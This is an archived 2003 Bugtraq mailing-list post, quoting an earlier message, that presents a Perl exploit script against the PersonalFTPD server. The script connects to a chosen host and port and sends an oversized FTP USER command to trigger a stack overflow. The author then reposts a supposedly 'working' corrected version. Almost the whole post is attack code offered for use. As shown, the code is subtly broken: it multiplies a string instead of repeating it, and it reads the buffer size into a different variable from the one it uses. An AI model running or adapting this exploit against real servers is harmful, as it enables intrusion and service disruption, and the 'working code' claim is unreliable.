| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 8 May 2003 17:25:53 -0000
From: subj <r2subj3ct@...lan.org>
To: bugtraq@...urityfocus.com
Subject: Re: Remote Stack Overflow exploit for Personal FTPD
In-Reply-To: <20030508081123.13047.qmail@....securityfocus.com>
>Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000
>Received: from outgoing2.securityfocus.com (205.206.231.26)
> by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com
[205.206.231.19])
> by outgoing2.securityfocus.com (Postfix) with QMQP
> id ED2648F2D9; Thu, 8 May 2003 08:19:59 -0600 (MDT)
>Mailing-List: contact bugtraq-help@...urityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@...urityfocus.com>
>List-Help: <mailto:bugtraq-help@...urityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@...urityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@...urityfocus.com>
>Delivered-To: mailing list bugtraq@...urityfocus.com
>Delivered-To: moderator for bugtraq@...urityfocus.com
>Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000
>Date: 8 May 2003 08:11:23 -0000
>Message-ID: <20030508081123.13047.qmail@....securityfocus.com>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: subj <r2subj3ct@...lan.org>
>To: bugtraq@...urityfocus.com
>Subject: Remote Stack Overflow exploit for Personal FTPD
>
>
>
>#!/usr/bin/perl
>use IO::Socket;
>
>##########################################################
># #
># Remote Stack Overflow sploit for PersonalFTPD #
># If wanna talk with me find me on irc #
># irc.irochka.net #dwc, #global, #phreack #
># ###################################################### #
># thanx to kabuto, drG4njubas, fnq #
># gr33tz to dhg, gipshack, rsteam, blacktigerz #
># D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 #
># ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z #
># ###################################################### #
># Vulnerability links: #
># http://security.nnov.ru/search/document.asp?docid=4309 #
># http://www.securityfocus.com/archive/1/316958 #
># #
>##########################################################
>
>$data = "A";
>
>print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
>print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
>print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";
>print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";
>print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";
>
>$count_param=@...V;
>$n="0";
>if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer
>size\n\n"; exit; }
>while ($n<$count_param) {
>if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
>if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
>if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
>$n++;
>}
>&connect;
>
>sub connect
>{
>$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort
=> "$port",
>Proto => "tcp")
> || die "Can\'t connect to $server port $port\n";
>print $sock "USER $buffer\n";
>print "Buffer has beens sended...";
>
>}
>
>
>close($sock);
>exit;
>
--------------------------------------------------------------------------
I bring the apologies, has laid out not working version, simply was
mistaken a file, before $sock it is necessary to add $buffer. = $data *
$bsize;
Working code
#!/usr/bin/perl
use IO::Socket;
##########################################################
# #
# Remote Stack Overflow sploit for PersonalFTPD #
# If wanna talk with me find me on irc #
# irc.irochka.net #dwc, #global, #phreack #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq #
# gr33tz to dhg, gipshack, rsteam, blacktigerz #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z #
# ###################################################### #
# Vulnerability links: #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958 #
# #
##########################################################
$data = "A";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";
print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";
$count_param=@...V;
$n="0";
if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer
size\n\n"; exit; }
while ($n<$count_param) {
if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
$n++;
}
&connect;
sub connect
{
$buffer.= $data * $bsize;
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port",
Proto => "tcp")
|| die "Can\'t connect to $server port $port\n";
print $sock "USER $buffer\n";
print "Buffer has beens sended...";
}
close($sock);
exit;
Powered by blists - more mailing lists